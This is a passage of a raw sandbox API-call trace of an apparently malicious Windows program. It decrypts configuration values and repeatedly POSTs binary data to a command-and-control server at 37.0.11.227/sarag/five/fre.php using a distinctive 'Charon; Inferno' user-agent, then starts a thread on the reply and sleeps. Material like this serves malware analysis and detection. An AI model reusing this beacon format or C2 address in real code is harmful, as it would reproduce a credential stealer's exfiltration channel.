0x76b70000 [0277.472] CryptImportKey (in: hProv=0x6aeff0, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0277.473] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0277.473] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0277.474] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0277.474] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0277.474] GetProcessHeap () returned 0x690000 [0277.474] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0277.475] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0277.475] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0277.476] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0277.476] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0277.477] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0277.477] CryptReleaseContext (hProv=0x6aeff0, dwFlags=0x0) returned 1 [0277.477] GetProcessHeap () returned 0x690000 [0277.477] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0277.478] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0277.478] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0277.478] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0277.479] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0277.479] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0277.480] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0277.480] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0277.480] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0277.480] GetProcessHeap () returned 0x690000 [0277.481] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0277.481] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0277.481] GetProcessHeap () returned 0x690000 [0277.481] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab430 [0277.481] socket (af=2, type=1, protocol=6) returned 0x884 [0277.481] connect (s=0x884, name=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0277.510] FreeAddrInfoW (pAddrInfo=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0277.510] GetProcessHeap () returned 0x690000 [0277.510] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6af188 [0277.510] GetProcessHeap () returned 0x690000 [0277.510] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b97c0 [0277.511] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0277.512] wvsprintfA (in: param_1=0x6b97c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0277.512] GetProcessHeap () returned 0x690000 [0277.512] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6b0040 [0277.512] GetProcessHeap () returned 0x690000 [0277.512] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0277.512] GetProcessHeap () returned 0x690000 [0277.512] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a3fe0 [0277.512] GetProcessHeap () returned 0x690000 [0277.512] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b97c0 [0277.513] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0277.514] wvsprintfA (in: param_1=0x6b97c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0277.514] GetProcessHeap () returned 0x690000 [0277.514] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0277.514] GetProcessHeap () returned 0x690000 [0277.514] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0277.514] send (s=0x884, buf=0x6ad508*, len=242, flags=0) returned 242 [0277.514] send (s=0x884, buf=0x6aba40*, len=159, flags=0) returned 159 [0277.515] GetProcessHeap () returned 0x690000 [0277.515] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0277.515] recv (in: s=0x884, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0277.587] GetProcessHeap () returned 0x690000 [0277.587] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0277.587] GetProcessHeap () returned 0x690000 [0277.587] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0277.587] GetProcessHeap () returned 0x690000 [0277.588] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b0040 | out: hHeap=0x690000) returned 1 [0277.588] GetProcessHeap () returned 0x690000 [0277.588] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af188 | out: hHeap=0x690000) returned 1 [0277.588] closesocket (s=0x884) returned 0 [0277.589] GetProcessHeap () returned 0x690000 [0277.590] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab430 | out: hHeap=0x690000) returned 1 [0277.590] GetProcessHeap () returned 0x690000 [0277.590] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0277.590] GetProcessHeap () returned 0x690000 [0277.590] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0277.590] GetProcessHeap () returned 0x690000 [0277.590] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0277.591] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1644) returned 0x884 [0277.593] Sleep (dwMilliseconds=0xea60) [0277.594] GetProcessHeap () returned 0x690000 [0277.594] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4418 [0277.595] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0277.595] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0277.602] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0277.603] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af078) returned 1 [0277.610] GetProcessHeap () returned 0x690000 [0277.611] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8940 [0277.611] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0277.612] CryptImportKey (in: hProv=0x6af078, pbData=0x6a8940, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0277.612] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0277.612] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0277.613] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0277.613] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0277.613] GetProcessHeap () returned 0x690000 [0277.614] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8940 | out: hHeap=0x690000) returned 1 [0277.617] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0277.618] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4418, pdwDataLen=0x19fcfc | out: pbData=0x6a4418, pdwDataLen=0x19fcfc) returned 1 [0277.618] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0277.619] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0277.619] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0277.619] CryptReleaseContext (hProv=0x6af078, dwFlags=0x0) returned 1 [0277.619] GetProcessHeap () returned 0x690000 [0277.620] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0277.620] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0277.620] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0277.621] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0277.621] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0277.622] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0277.622] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0277.623] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0277.623] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0277.623] GetProcessHeap () returned 0x690000 [0277.623] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0277.623] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0277.623] GetProcessHeap () returned 0x690000 [0277.624] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0277.624] GetProcessHeap () returned 0x690000 [0277.624] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0277.624] GetProcessHeap () returned 0x690000 [0277.624] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0277.624] GetProcessHeap () returned 0x690000 [0277.624] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0277.625] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0277.625] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0277.629] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0277.630] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0277.635] GetProcessHeap () returned 0x690000 [0277.635] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0277.635] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0277.636] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0277.636] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0277.637] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0277.637] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0277.637] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0277.637] GetProcessHeap () returned 0x690000 [0277.638] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0277.639] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0277.639] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0277.639] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0277.640] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0277.640] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0277.641] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0277.641] GetProcessHeap () returned 0x690000 [0277.641] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0277.641] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0277.641] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0277.642] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0277.642] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0277.643] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0277.643] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0277.644] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0277.644] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0277.644] GetProcessHeap () returned 0x690000 [0277.644] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0277.644] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0277.644] GetProcessHeap () returned 0x690000 [0277.644] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab320 [0277.644] socket (af=2, type=1, protocol=6) returned 0x888 [0277.645] connect (s=0x888, name=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0277.670] FreeAddrInfoW (pAddrInfo=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0277.670] GetProcessHeap () returned 0x690000 [0277.670] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6af188 [0277.670] GetProcessHeap () returned 0x690000 [0277.670] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b97c0 [0277.670] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0277.671] wvsprintfA (in: param_1=0x6b97c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0277.671] GetProcessHeap () returned 0x690000 [0277.671] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af5c0 [0277.671] GetProcessHeap () returned 0x690000 [0277.672] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0277.672] GetProcessHeap () returned 0x690000 [0277.672] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0277.672] GetProcessHeap () returned 0x690000 [0277.672] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b97c0 [0277.673] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0277.673] wvsprintfA (in: param_1=0x6b97c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0277.673] GetProcessHeap () returned 0x690000 [0277.673] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0277.673] GetProcessHeap () returned 0x690000 [0277.674] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0277.674] send (s=0x888, buf=0x6ad508*, len=242, flags=0) returned 242 [0277.674] send (s=0x888, buf=0x6aba40*, len=159, flags=0) returned 159 [0277.674] GetProcessHeap () returned 0x690000 [0277.674] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0277.674] recv (in: s=0x888, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0277.776] GetProcessHeap () returned 0x690000 [0277.777] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0277.777] GetProcessHeap () returned 0x690000 [0277.777] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0277.777] GetProcessHeap () returned 0x690000 [0277.778] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af5c0 | out: hHeap=0x690000) returned 1 [0277.778] GetProcessHeap () returned 0x690000 [0277.779] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af188 | out: hHeap=0x690000) returned 1 [0277.779] closesocket (s=0x888) returned 0 [0277.779] GetProcessHeap () returned 0x690000 [0277.779] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab320 | out: hHeap=0x690000) returned 1 [0277.779] GetProcessHeap () returned 0x690000 [0277.780] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0277.780] GetProcessHeap () returned 0x690000 [0277.780] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0277.780] GetProcessHeap () returned 0x690000 [0277.780] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0277.780] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1648) returned 0x888 [0277.781] Sleep (dwMilliseconds=0xea60) [0277.785] GetProcessHeap () returned 0x690000 [0277.785] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4148 [0277.785] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0277.786] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0277.804] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0277.805] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af078) returned 1 [0277.810] GetProcessHeap () returned 0x690000 [0277.811] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88b0 [0277.811] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0277.811] CryptImportKey (in: hProv=0x6af078, pbData=0x6a88b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0277.812] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0277.812] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0277.813] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0277.813] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0277.813] GetProcessHeap () returned 0x690000 [0277.814] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88b0 | out: hHeap=0x690000) returned 1 [0277.815] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0277.815] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4148, pdwDataLen=0x19fcfc | out: pbData=0x6a4148, pdwDataLen=0x19fcfc) returned 1 [0277.815] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0277.816] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0277.816] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0277.817] CryptReleaseContext (hProv=0x6af078, dwFlags=0x0) returned 1 [0277.817] GetProcessHeap () returned 0x690000 [0277.817] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0277.817] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0277.817] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0277.818] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0277.818] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0277.819] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0277.819] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0277.820] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0277.822] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0277.822] GetProcessHeap () returned 0x690000 [0277.822] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0277.822] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0277.822] GetProcessHeap () returned 0x690000 [0277.823] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0277.823] GetProcessHeap () returned 0x690000 [0277.824] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0277.824] GetProcessHeap () returned 0x690000 [0277.824] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0277.824] GetProcessHeap () returned 0x690000 [0277.824] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0277.827] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0277.827] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0277.831] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0277.831] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0277.839] GetProcessHeap () returned 0x690000 [0277.839] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88e0 [0277.839] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0277.840] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a88e0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0277.840] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0277.841] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0277.841] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0277.842] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0277.842] GetProcessHeap () returned 0x690000 [0277.842] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88e0 | out: hHeap=0x690000) returned 1 [0277.845] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0277.845] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0277.845] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0277.846] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0277.846] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0277.847] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0277.847] GetProcessHeap () returned 0x690000 